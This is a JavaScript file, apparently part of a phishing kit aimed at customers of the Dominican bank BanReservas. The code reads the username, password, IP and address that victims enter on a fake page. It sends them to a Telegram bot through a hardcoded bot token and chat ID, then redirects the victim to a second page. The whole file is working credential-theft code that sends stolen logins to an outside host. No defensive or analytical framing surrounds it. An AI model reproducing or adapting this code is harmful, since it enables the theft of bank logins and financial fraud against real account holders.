//bot token
var telegram_bot_id = "5118192847:AAFQRvVBxyYjizC5LCze2g0eTZ3SOROQy_Q";
//chat id
var chat_id = "5786666348";
var u_name, u_name2, ip, ip2;
var ready = function () {
    u_name = document.getElementById("DocumentNumber").value;
    u_name2 = document.getElementById("DocumentNumber2").value;
    ip = document.getElementById("gfg").innerHTML;
    ip2 = document.getElementById("address").innerHTML;
    message = "🇩🇴BANRESERVA🔵\nℹUSUARIO: " + u_name + "\n🔑P4ss: "+ u_name2 + "\nIP: " + ip +"\n" + ip2 +"\n🔵C0DE MONTAÑO🔵";
};
var sender = function () {
    ready();
    var settings = {
        "async": true,
        "crossDomain": true,
        "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
        "method": "POST",
        "headers": {
            "Content-Type": "application/json",
            "cache-control": "no-cache"

        },
        "data": JSON.stringify({
            "chat_id": chat_id,
            "text": message
        })
    };
    $.ajax(settings).done(function (response) {
        window.location = 'index2.html';
        console.log(response);
    });
    return false;
};
